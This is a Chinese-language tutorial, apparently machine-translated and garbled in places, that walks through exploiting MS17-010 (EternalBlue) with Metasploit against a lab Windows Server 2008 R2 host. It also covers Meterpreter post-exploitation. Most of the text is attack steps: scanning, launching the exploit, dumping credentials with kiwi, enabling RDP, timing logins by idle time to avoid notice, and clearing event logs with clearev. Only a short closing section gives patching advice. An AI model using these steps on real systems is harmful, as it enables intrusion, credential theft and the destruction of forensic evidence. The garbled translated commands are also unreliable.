ms17-010(eternalblue永恒蓝) )漏洞利用修复方法简介0x01准备工作0x02漏洞利用0x03修复方案总结
前言关于操作系统的脆弱性,你听说过众所周知的永恒蓝(MS17-010 )吧。 他的爆炸源于WannaCry病毒恐吓的诞生。
不法分子利用美国国家安全局(NSA )泄露的危险漏洞“EternalBlue”(外部蓝)感染该病毒。 恐吓病毒是一场全球性的互联网灾难,给许多计算机用户造成了巨大的损失。 最新统计数据显示,超过100个国家和地区有10万台计算机受到勒索病毒的攻击和感染。 勒索病毒是熊猫烧香以来最具影响力的病毒之一。
本文使用Metasploit工具演示和建议修复此漏洞漏洞利用。
0x01准备工作靶机: windows server 2008 R2 (IP :192.168.178.128 )攻击机: Kali2020(IP3360192.168.178.131 )工具: namap
在nmap-- script=vuln 192.168.178.128中,可以看到目标机上扫描了四个漏洞,包括MS17-010。
metasploit (打开MSF很有趣,每次打开都会显示不同的画面。 )
MSF控制台
搜索ms17-010相关模块,共找到六个不同的模块。 (可选:0-5)
搜索毫秒17-010
加载扫描模块。 (选项1 )
查看use auxiliary/scanner/SMB/SMB _ ms17 _ 010配置选项
显示选项
RHOSTS表示远程主机未配置,并且已配置目标主机。
set rhosts 192.168.178.128
开始扫描漏洞,再次确认靶机有MS17-010的漏洞。
退出
使用永远的蓝色攻击模块: exploit/windows/SMB/ms17 _ 010 _ eternal blue
然后设定攻击载荷:
设置支付
检查选项并配置rhosts:
set rhosts 192.168.178.128
键入exploit开始攻击。 如果执行成功,将显示元数据
Meterpreter是Metasploit的扩展模块,可以调用Metasploit的某些功能。
让目标系统深入人心,包括获取屏幕、上传/下载文件和创建永久后门。
演示一些功能
捕获屏幕元数据屏幕快照
文件meterpreteruploadhello.txtc : /
meterpreterdownloadd ://1. txt
远程桌面元数据run VNC启动失败。 目标计算机似乎没有启动vnc服务。
获取了cmd,发生了编码问题。 元数据外壳
获取用户密码meterpreterloadkiwiloadingextensionkiwi . success.kiwi在32位系统上正常工作,而在64位系统上需要迁移进程
有关迁移流程的信息,请访问http://hack dig.com/09/hack-144260.htm
流程迁移完成后:
meterpreter creds_all
启用远程桌面,使其与上一步中获取的密码配合使用。 meterpreterrunpost/windows/manage/enable _ RDP通常用于检查远程用户的空闲时间,并在空闲时间较长时进行远程登录以降低发现的风险登录rdp后将对手推下。
meterpreter idletime
使用rdesktop命令远程连接到桌面
root @ kali :~# rdesktop 192.168.2.6
使用在上一步中获取的帐户密码登录,登录成功。
在清除日志meterpreter clearev并清除日志之前,目标的事件查看器如下所示: (记录了大量事件)
被清空了~
还有很多其他功能选项,请自己查一下。 我不会全部罗列。
0x03修正案受影响的系统版本见https://docs.Microsoft.com/zh-cn/security-updates/security bulletins/2017/ms17-010
关闭445端口。 打开防火墙并安装安全软件。 安装支持的修补程序。 为了维护操作系统的安全,我们所能做的就是及时更新、安装修补程序、关闭不必要的服务和端口。